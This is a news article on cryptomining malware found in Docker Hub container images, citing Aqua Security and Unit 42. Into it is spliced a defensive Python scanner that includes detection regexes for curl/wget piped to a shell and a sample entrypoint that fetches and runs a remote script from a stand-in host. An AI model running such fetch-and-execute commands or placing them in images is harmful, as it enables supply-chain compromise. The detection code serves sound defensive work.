Docker Hub Distributing Cryptomining Malware?

A pair of cybersecurity reports published this week suggests the level of cryptomining malware lurking in the Docker Hub repository is potentially greater than most IT teams realize.

Aqua Security, a provider of tools for scanning container images, reports it has discovered no fewer than 23 container images stored in Docker Hub that carried a potentially unwanted application (PUA), hidden either within their image layers or downloaded into instantiated containers at runtime.

The images then download and run a cryptocurrency miner at runtime, and the miner in turn appears to fetch additional malicious components from the GitHub code repository while the container is running.
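The second pattern above, a payload fetched only when the container starts, is exactly what a scan of the static image layers will miss. The script below is an added example (not Aqua Security's or Unit 42's tooling) that inspects an image config's build history and its Entrypoint/Cmd for fetch-and-execute commands; the config, the `example.invalid` URL and the regex heuristics are constructed for illustration.

```python
import json
import re

# Heuristic patterns for "download something, then execute it". Added example,
# not Aqua Security's or Unit 42's tooling; not an exhaustive signature set.
FETCH = re.compile(r"\b(curl|wget)\b[^|;&]*\b(https?://\S+)")
PIPE_TO_SHELL = re.compile(r"\|\s*(sh|bash)\b")
EXEC_AFTER_FETCH = re.compile(r"\b(curl|wget)\b.*?(;|&&).*?(chmod\s+\+x|\bsh\s|\bbash\s|\./)")

def suspicious(cmd):
    """Return the reasons one shell command looks like fetch-and-execute."""
    fetch = FETCH.search(cmd)
    if not fetch:
        return []
    url = fetch.group(2)
    if PIPE_TO_SHELL.search(cmd):
        return [f"pipes remote content into a shell: {url}"]
    if EXEC_AFTER_FETCH.search(cmd):
        return [f"downloads and then executes: {url}"]
    return []

def audit_image_config(config):
    """Scan build-layer history and the Entrypoint/Cmd that run at container start."""
    findings = []
    for i, layer in enumerate(config.get("history", [])):
        for reason in suspicious(layer.get("created_by", "")):
            findings.append({"where": f"layer {i}", "reason": reason})
    runtime = config.get("config", {})
    for key in ("Entrypoint", "Cmd"):
        for reason in suspicious(" ".join(runtime.get(key) or [])):
            findings.append({"where": key, "reason": reason})
    return findings

# Constructed image config (shape follows `docker image inspect` / the OCI config):
# the build layers look clean, but the entrypoint fetches and runs a remote
# script every time the container starts, so a layer-only scan sees nothing.
SAMPLE_CONFIG = json.loads("""{
  "history": [
    {"created_by": "/bin/sh -c #(nop) ADD file:abc123 in /"},
    {"created_by": "/bin/sh -c apt-get update && apt-get install -y curl"}
  ],
  "config": {
    "Entrypoint": ["/bin/sh", "-c",
      "curl -sL https://example.invalid/setup.sh | sh && exec /app/start"]
  }
}""")

if __name__ == "__main__":
    for f in audit_image_config(SAMPLE_CONFIG):
        print(f"{f['where']}: {f['reason']}")
```

Run it against the output of `docker image inspect <image>` (the `Config` and, via `docker history`, the layer commands) to see which images defer their real payload to container start.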

Assaf Morag, lead data analyst for Aqua Security, says the images have been downloaded more than 330,000 times and appear to have been created by a hacking group based in Algeria.

That report comes on the heels of a similar finding from the Unit 42 research arm of Palo Alto Networks (PAN), which identified a malicious Docker Hub account active since October 2019 that was hosting six malicious images that mine Monero cryptocurrency.

The account, since deactivated, was used to house coin mining code within the image that evaded detection by using network anonymizing tools such as ProxyChains and Tor.

Jen Miller-Osborn, deputy director for threat intelligence at Unit 42, says the images hosted on this account collectively have been pulled more than 2 million times. One of the wallet IDs identified as being used by the cybercriminals to collect cryptocurrency earned more than $36,000.

In both cases, cryptomining malware was embedded within what appeared to be a vetted container image. Once installed, crypto miners typically consume only a small amount of the available processing power, which Miller-Osborn notes is why so many organizations tend to view cryptomining malware as more of a nuisance than a cybersecurity threat.

How much cryptomining malware lurks on Docker Hub or other repositories is unknown. Cybercriminals have been employing containers to deploy cryptomining malware surreptitiously within IT environments for years. Much like any developer of software, cybercriminals are embracing containers to create malware that can run anywhere and is simple to update. Platforms such as Docker Hub then provide an efficient mechanism to distribute that malware.

Morag says now that cybersecurity professionals have access to dynamic application security testing (DAST) tools, it is becoming easier to discover malware embedded within container images. As such, the number of malware discoveries involving containers should increase sharply. That doesn’t necessarily mean, however, there is more malware showing up in repositories; rather, it just means cybersecurity teams are getting better at discovering what malware is already there.

While cryptojacking malware may seem like a victimless crime, Miller-Osborn says IT organizations are left to wonder what other types of malware might have been embedded with the container images they have downloaded.

Less clear, of course, is to what degree development teams might start relying on platforms other than Docker Hub to distribute container images, given the rise of alternatives. Regardless of the platform employed, it’s apparent the depth and frequency of container scanning need to improve.

Mike Vizard

Mike Vizard is a seasoned IT journalist with over 25 years of experience. He also contributed to IT Business Edge, Channel Insider, Baseline and a variety of other IT titles. Previously, Vizard was the editorial director for Ziff-Davis Enterprise as well as Editor-in-Chief for CRN and InfoWorld.
